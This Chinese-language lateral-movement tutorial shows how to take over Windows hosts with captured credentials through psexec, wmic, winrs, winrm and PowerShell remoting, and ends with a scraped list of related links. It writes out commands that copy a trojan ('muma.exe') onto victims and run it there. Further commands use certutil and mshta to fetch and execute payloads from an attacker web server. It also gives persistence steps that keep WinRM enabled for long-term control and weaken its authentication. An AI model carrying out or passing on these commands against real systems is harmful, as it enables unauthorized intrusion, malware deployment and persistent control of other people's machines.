以下所有实验均在工作组环境下

psexec

psexec.exe \\ip –accepteula -u username -p password program.exe
psexec.exe \\host -accepteula -u domain\username -p password -d -c
#这里面的账号密码都是被攻击机器的账号密码,ip与host也是被攻击主机的ip与host。
如果是域环境的话,命令为PsExec.exe \\192.168.23.99 -u test\lisi -p 123 -c cmd

获取对方主机的账号密码后且对方开启445端口,可以使用psexec来进行远程命令执行。
psexec \\172.16.99.233 -u administrator -p 123 -c cmd.exe 获取cmdshell
psexec \\172.16.99.233 -u administrator -p 123 -c muma.exe
#这里面的账号密码都是被攻击机器的账号密码,ip与host也是被攻击主机的ip与host。

使172.16.99.233主机执行在172.16.99.235上的muma.exe文件。达到了在远程主机执行本地文件的目的。攻击机器为172.16.99.235,muma.exe这个文件也在172.16.99.235这个主机上,但是通过上面的命令就可以使得这个文件执行在172.16.99.233这个主机上,进而达到远程控制的效果。

当psexec执行失败当时候,可以按住shift右键点击cmd选择以其他用户启动shell,输入高权限用户当凭据即可。如下图:

wmic

方法1:控制远程主机下载并执行文件

wmic /node:172.16.99.233 /user:Administrator /password:123  process call create "cmd /c  certutil.exe -urlcache -split -f http://172.16.99.233/muma.exe c:/windows/temp/putty3.exe & c:/windows/temp/putty3.exe"

#这里面的账号密码都是被攻击机器的账号密码,ip与host也是被攻击主机的ip与host。

上述命令的意思是,连接172.16.99.233并创建一个进程,这个进程是使用cmd 执行命令去 http://172.16.99.233/muma.exe下载这个文件,并保存到本地的 c:/windows/temp/putty3.exe并执行。

方法2:复制本地文件到远程主机并控制远程主机执行

copy muma.exe \\172.16.99.233\c$\windows\temp\test.exe  ##IPC拷贝木马文件
wmic /node:172.16.99.233 /user:administrator /password:123 process call create “c:\windows\temp\test.exe”

#这里面的账号密码都是被攻击机器的账号密码,ip与host也是被攻击主机的ip与host。

winrm服务

winrm是一种服务,通过WSMan协议实现与远程计算机的对话。有3种方式对其进行操作:
经测试,域控主机只能用winrm不能用mshta与wmic上线。且利用winrs命令上线的话shell会卡住。

1.winrm命令
2.winrs命令
3.powershell

windows server自2008开始默认启动winrm服务,默认情况下,WinRM服务后台已经运行,但并不开启监听模式,因此无法接受和发送数据。使用WinRM提供的quickconfig对WinRM进行配置后,Windows将开启监听并打开HTTP及HTTPS监听端口。

1.winrs

当目标开启winrm服务的时候:

winrs -r:yukong -u:test\administrator -p:123 "hostname"
winrs -r:lisi-win10 -u:test\administrator -p:123 "cmd.exe /c mshta http://192.168.124.7:8080/a.png"
winrs -r:lisi-win10 -u:test\administrator -p:123 "wmic os get /format:"http://192.168.124.7:8080/a.xsl""


如果目标没有开启winrm服务,则会报错:

2.winrm

如若当前机器开启了winrm则可查看状态

winrm enumerate winrm/config/listener

如果目标主机开启winrm服务,则可使用命令在远程主机执行命令,例如打开calc.exe:

winrm invoke Create wmicimv2/win32_process @{CommandLine="calc.exe"} -r:lisi-win10 -u:test\administrator -p:123
winrm invoke Create wmicimv2/win32_process @{CommandLine="cmd.exe /c mshta http://192.168.124.7:8080/a.png"} -r:lisi-win10 -u:test\administrator -p:123

可知道程序已被打开,并且pid为4460,但当我登陆被攻击机器的时候发现,程序确实被打开,但是pid不是4460.

我们拿到一台主机后,如果当前主机没有开启winrm服务,我们可以在管理员权限下执行下面的命令来长期开启winrm服务,然后利用其账号密码进行长期控制:

powershell Enable-PSRemoting –force
powershell Set-Service WinRM -StartMode Automatic

winrm其他命令:

#查看WinRM状态
winrm enumerate winrm/config/listener#开启WinRM远程管理
Enable-PSRemoting –force#设置WinRM自启动
Set-Service WinRM -StartMode Automatic#对WinRM服务进行快速配置,包括开启WinRM和开启防火墙异常检测,默认的5985端口
winrm quickconfig -q
#对WinRM服务进行快速配置,包括开启WinRM和开启防火墙异常检测,HTTPS传输,5986端口
winrm quickconfig -transport:https    #查看WinRM的配置
winrm get winrm/config#查看WinRM的监听器
winrm e winrm/config/listener#为WinRM服务配置认证
winrm set winrm/config/service/auth '@{Basic="true"}'#修改WinRM默认端口
winrm set winrm/config/client/DefaultPorts '@{HTTPS="8888"}'#为WinRM服务配置加密方式为允许非加密:
winrm set winrm/config/service '@{AllowUnencrypted="true"}'#设置只允许指定IP远程连接WinRM
winrm set winrm/config/Client '@{TrustedHosts="192.168.10.*"}'#执行命令
winrm invoke create wmicimv2/win32_process -SkipCAcheck -skipCNcheck '@{commandline="calc.exe"}'#在dc机器上面执行命令并且指定用户名和密码
winrm invoke Create wmicimv2/win32_process @{CommandLine="calc.exe"} -r:dc -u:one\administrator -p:q123456.

3.powershell

Enter-PSSession -computer lisi-win10 #高权限用户可以直接控制低权限用户的主机

windows远程命令执行相关推荐

  1. Windows远程命令执行0day漏洞安全预警

      网站安全云检测这不是腾讯公司的官方邮件. 为了保护邮箱安全,内容中的图片未被显示. 显示图片 信任此发件人的图 片 一.概要 Shadow Brokers泄露多个Windows 远程漏洞利用工具, ...

  2. Windows更新+中间人=远程命令执行

    小飞 · 2015/11/26 15:57 0x00 Windows Server Update Services WSUS是Windows Server Update Services的简称.利用这 ...

  3. Windows 远程控制(经典IPC$入侵、psexec类工具、利用WMI远程入侵、PsRemoting远程命令执行、使用wmic命令远程执行)

    一.经典IPC$入侵 利用ipc$和默认共享入侵远程电脑的过程 1. C:\>net use \\127.0.0.1\IPC$ "密码" /user:"用户名&qu ...

  4. 【漏洞复现】ThinkPHP5 5.x 远程命令执行(getshell)

    0x00复现环境 ThinkPHP 5.x (v5.0.23及v5.1.31以下版本) 远程命令执行漏洞利用(GetShell) 0x01步骤 点击start to hack 进入环境页面 run t ...

  5. URI Scheme注册伪协议实现远程命令执行

    Windows配置注册表注册伪协议 1.新建伪协议项 WIN+R 输入regedit 打开注册表,在注册表HKEY_CLASSES_ROOT键中新建一个项,项的名字就是你伪协议的名字,例如我注册一个c ...

  6. 命令执行——远程命令执行(二)

    普及远程命令执行漏洞相关函数和利用 远程命令执行漏洞相关函数 在PHP下,允许命令执行的函数有: >eval() >assert() >preg_replace() >call ...

  7. 又被野外利用了!新曝光Office产品多个远程命令执行漏洞分析

    本文讲的是又被野外利用了!新曝光Office产品多个远程命令执行漏洞分析, 早在2015年,FireEye曾发布过两次关于Office的Encapsulated PostScript (EPS)图形文 ...

  8. ThinkPHP V5.0.5漏洞_ThinkPHP 5.x 远程命令执行漏洞分析与复现

    php中文网最新课程 每日17点准时技术干货分享 0x00 前言 ThinkPHP 官方 2018 年 12 月 9 日发布重要的安全更新,修复了一个严重的远程代码执行漏洞.该更新主要涉及一个安全更新 ...

  9. war包启动命令_【漏洞预警】Oracle WebLogic远程命令执行0day漏洞(CVE20192725补丁绕过)...

    概述 近日,奇安信天眼与安服团队通过数据监控发现,野外出现Oracle WebLogic远程命令执行漏洞最新利用代码,此攻击利用绕过了厂商今年4月底所发布的最新安全补丁(CVE-2019-2725). ...

最新文章

  1. AI一分钟 | 小米发布小爱音箱mini,169元;天猫汽车无人贩卖机大楼落地,刷脸可购车试驾
  2. coreutils-5.0中几个命令的执行过程
  3. python层次聚类法画图_Python实现简单层次聚类算法以及可视化
  4. 具有数据库依赖性的.NET Core应用程序的集成测试
  5. 浏览器如何解析HTML文档
  6. unity3d的uGUI基本操作
  7. 联通、华为双双辟谣:云计算不要太火
  8. python 爬取直播_python 斗鱼直播间爬取代码
  9. JavaScript 计数器
  10. 3D打印的四种应用场合
  11. ROS中NodeHandle nh与NodeHandle nh(“~“)区别
  12. 二元隐函数求二阶偏导_隐函数求二阶偏导
  13. 证券公司信息化7-资产管理业务的沿革。为什么要有资产管理系统?
  14. Automated Installations of Multiple RHEL/CentOS 7 Distributions using PXE Server and Kickstart Files
  15. 天池竞赛——服务器故障预测
  16. Java 创建pdf
  17. 跟涛哥一起学嵌入式 26:深入浅出计算机编码、乱码问题
  18. 集合(Collections)
  19. P1017 进制转换 (洛谷)
  20. php fundamentals,HZNUOJ--Programming Fundamentals

热门文章

  1. 在线loading图标生成网站
  2. Shader 海面/水面
  3. 修改32位的AutoCAD2012,使其能在64位系统上安装
  4. python随机密码生成以整数17为随机数种子_python习题 随机密码生成 + 连续质数计算...
  5. java BigDecimal比较大小
  6. 创新科技成果广东功能性水稻品种 国稻种芯百团计划行动
  7. 工作展望简短_工作展望简短_时间2017工作展望
  8. 阿里云飞天计划体验-阿里云开发者社区
  9. 操作系统与计算机网络
  10. 行人三维姿态与形状估计面试准备